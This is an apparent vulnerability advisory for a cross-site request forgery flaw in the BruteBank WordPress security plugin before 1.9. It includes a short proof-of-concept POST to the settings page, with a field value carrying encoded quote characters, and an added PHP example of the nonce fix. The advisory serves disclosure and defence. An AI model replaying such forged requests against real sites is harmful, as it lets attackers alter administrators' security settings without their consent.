BruteBank - WP Security & Firewall < 1.9 - Settings Update via CSRF
Description
The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
POST /wp-admin/admin.php?page=brutebank-settings HTTP/1.1

public_key=site.a%22%2522aaaa%3Daaa&secret_key=aaa&update=Update
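The fix for this class of bug is the standard WordPress nonce pattern: the settings form carries a nonce minted for the current user and action, and the handler refuses to save unless that nonce verifies. The following is an added illustration, not the plugin's own code; the option names, the function prefix bb_example_ and the page callback are assumptions, only the menu slug and the field names public_key, secret_key and update are taken from the request above.

```php
<?php
// Added illustration (not BruteBank's code): a settings handler for a
// hypothetical "brutebank-settings" admin page, guarded by a WordPress nonce
// so that a cross-site forged POST like the one in the PoC is rejected.
// Option names and the bb_example_ prefix are assumptions.

add_action( 'admin_menu', function () {
    add_options_page(
        'BruteBank Settings',          // page title
        'BruteBank',                   // menu title
        'manage_options',              // capability required to see the page
        'brutebank-settings',          // menu slug (matches ?page= in the PoC)
        'bb_example_render_settings_page'
    );
} );

function bb_example_render_settings_page() {
    bb_example_handle_post();
    $public_key = get_option( 'bb_example_public_key', '' );
    settings_errors( 'bb_example' );
    ?>
    <form method="post" action="">
        <?php
        // Emits a hidden field bb_example_nonce tied to this action, this
        // site and the logged-in user. A third-party site cannot read or
        // forge it, which is what makes the check below effective.
        wp_nonce_field( 'bb_example_save_settings', 'bb_example_nonce' );
        ?>
        <label>Public key
            <input type="text" name="public_key"
                   value="<?php echo esc_attr( $public_key ); ?>">
        </label>
        <label>Secret key
            <input type="password" name="secret_key" value="">
        </label>
        <?php submit_button( 'Update', 'primary', 'update' ); ?>
    </form>
    <?php
}

function bb_example_handle_post() {
    if ( ! isset( $_POST['update'] ) ) {
        return; // nothing submitted
    }

    // Capability check: only users allowed to manage options may change them.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }

    // CSRF check. This is the line the vulnerable version lacks: without it
    // any POST carrying the three field names is accepted as long as the
    // victim's admin cookies are sent along. check_admin_referer() verifies
    // the nonce with wp_verify_nonce() and calls wp_die() on failure.
    check_admin_referer( 'bb_example_save_settings', 'bb_example_nonce' );

    // Only now is it safe to persist input; still sanitize it.
    $public_key = sanitize_text_field( wp_unslash( $_POST['public_key'] ?? '' ) );
    update_option( 'bb_example_public_key', $public_key );

    if ( ! empty( $_POST['secret_key'] ) ) {
        $secret_key = sanitize_text_field( wp_unslash( $_POST['secret_key'] ) );
        update_option( 'bb_example_secret_key', $secret_key );
    }

    add_settings_error( 'bb_example', 'saved', 'Settings saved.', 'updated' );
}
```

Two notes on the design. First, the nonce check and the capability check are distinct controls: current_user_can() answers "may this user do this", check_admin_referer() answers "did this user actually intend this request"; a CSRF attack passes the first and fails the second. Second, plugins that register their options through the Settings API (register_setting() with a form posting to options.php) get the nonce and capability checks from WordPress core for free; the hand-rolled handler above is the pattern for pages that process $_POST themselves, which is where checks like this tend to go missing.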
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
rezaduty
Submitter
rezaduty
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-28 (about 1 year ago)
Added
2022-12-28 (about 1 year ago)
Last Updated
2022-12-28 (about 1 year ago)